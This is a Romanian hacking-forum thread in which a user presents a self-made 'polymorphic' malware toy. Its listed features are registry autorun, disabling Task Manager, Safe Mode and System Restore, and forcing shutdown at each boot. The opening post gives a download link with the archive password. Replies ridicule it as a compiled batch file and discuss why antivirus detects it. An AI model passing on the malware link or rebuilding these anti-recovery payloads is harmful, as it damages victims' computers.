Jump to content
Alecsillidan

Polimorph Malware

Recommended Posts

Posted (edited)

Am facut o mica jucarie Marca RST, un malware polimorph.

Din pacate este detectat:

VirusTotal - Free Online Virus, Malware and URL Scanner

Ce face jucaria:

Autorun prin registry prin Run si Shell

Disable Task Manager

Disable Safe Mode

Disable System Restore

De fiecare data cand calculatorul va porni va da shutdown...destul de enervant :))

Link: www.softocan.com/polimorph1.rar

Parola arhivei este RST

As dori ca cineva cu virtual box sa il testeze.

Nu sariti cu critici!

Edited by Alecsillidan
am arhivat virusul
Posted

E malware, nu mai porneste PC-ul (pentru noobi), normal ca e detectat.

Este scris in DOS :)) Am facut un batch file ca punct de pornire, pe care l-am scris dupa intr-un compiler buguit de C, din cauza compilerului il vede ca malware pentru ca injecteaza scriptul in cmd. Adica in C am scris sa execute codul in cmd.

Scriptul de baza e simplu

Este aplicatie win32 ghost

Posted
E malware, nu mai porneste PC-ul (pentru noobi), normal ca e detectat.

Este scris in DOS :)) Am facut un batch file ca punct de pornire, pe care l-am scris dupa intr-un compiler buguit de C, din cauza compilerului il vede ca malware pentru ca injecteaza scriptul in cmd. Adica in C am scris sa execute codul in cmd.

Scriptul de baza e simplu

Este aplicatie win32 ghost

Ba baiatule eu zic ca nu dai bine cu capu sau ai 12 ani cel mult. Compiler buguit, injecteaza scriptul in cmd, aplicatie win32 ghost :)))) doamne

DOS nici nu mai exista pe platforma windows de la xp in coace ce mortii lui de legatura are si in plus ca e scris intr-un amarat de interpretor de scripturi care la randul lui e scris in Delphi.

Posted

Nu cred ca antivirusul iti gaseste tie daca l-ai facut sa inchida PC o data sau de f ori.

Sau si daca il inchide o data se considera malware ?

PS : iarta-mi noobitatea..

Posted (edited)

penibil, te asteptam totusi sa ne zici cum e troianul tau polimorf :(, a fi polimorf inseamna sa isi modifice mereu o parte din sursa in timp ce isi pastreaza functia intacta nu sa aiba nume random

Edited by root_prime
Posted

A fost scris in "Batch file" dupa care compilat, dupa cum se pare in "Quick Batch File Compiler. - Trial" apoi banuiesc pentru a nu lua cineva sursa la ce a facut el, l-a compilat in c++ introducand sa excute acel .exe compilat in "QBFC".

"intr-un compiler buguit de C, din cauza compilerului il vede ca malware"

Buguit de C ? (ei sunt devina a ? off, sa le facem reclamatie astora de la C sa fie mai atenti data viitoare) LOL. Si nu, NU este detectat ca find virus de la compilatorul "buguit de c" si nici de codul trecut in batch file.

Compilatorul "Quick Batch File Compiler" este cauza si nu doar el ci mai sunt si altele cum ar "Exescript", "Advanced batch converter", "Bat To Exe Converter" etc si cu tot cu updateurile lor tot vor fi detectate asta tocmai din cauza ca antivirusurile nu poate face in asa fel incat sa detecteze daca una sau mai mutle functii de tine trecute in batch file este de a face rau itentionat cuiva si ar fi imposibil sa faca asa ceva, asta ar fi insemanand ca nu am mai putea face nimic in batch file ca near fi detectat aiurea antivirusul ori ce cod si tocmai dasta a facut in asa fel ca, .bat-urile ce sunt compilate in .exe sa fie detectate.

De ce nu si .bat ? Am spus mai sus e imposibil si in plus se vede codul sursa dand un singur click pe Edit iar tu din moment ce vrei sa il faci din .bat in .exe desigur ca scopul este de a ascunde codul ce dauneaza in anumite moduri sistemul cuiva.

Malware ? Unde ?

Incerca doar sa iasa putin in evidenta si el ... zicand ca a facut mare chestie in c++ cand totul a fost in "bach file" apoi spunand ca e tot mai bine vb6, alta iesire de-a lui.:)

Si indiferent cum a fost codat/facut din moment ce "jucaria" dauneaza calculatorului vostru in diferite variante/metode il poti numi virus.

Daca stam bine sa ne gandim virusii cum sunt facuti ? Cresc in pom ?

Alecsillidan - Nu l-am incercat si nici nu o voi face dar presupun ca e ok cel putin pe Xp ca pe 7 sau Vista sunt alte locatii si in plus necesita sa pornesti "jucaria" prin click dreapta "Run administrator" pentru a se efectua comenzile in caz contrar vei primi "Acces denied."(insemnand ca, virusul tau nu si-a indeplinit sarcina cu succes).

Oricum, Bravo.

Posted

In schimbarea numelui.

Presupun ca, la descahidere schimba numele de la consola nu si de la fisier mai exact titlu de la consola "Command Prompt".

Prin o varianta de genul:

title %random%

Ce va genera un sir de numere random. gen "54316".

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...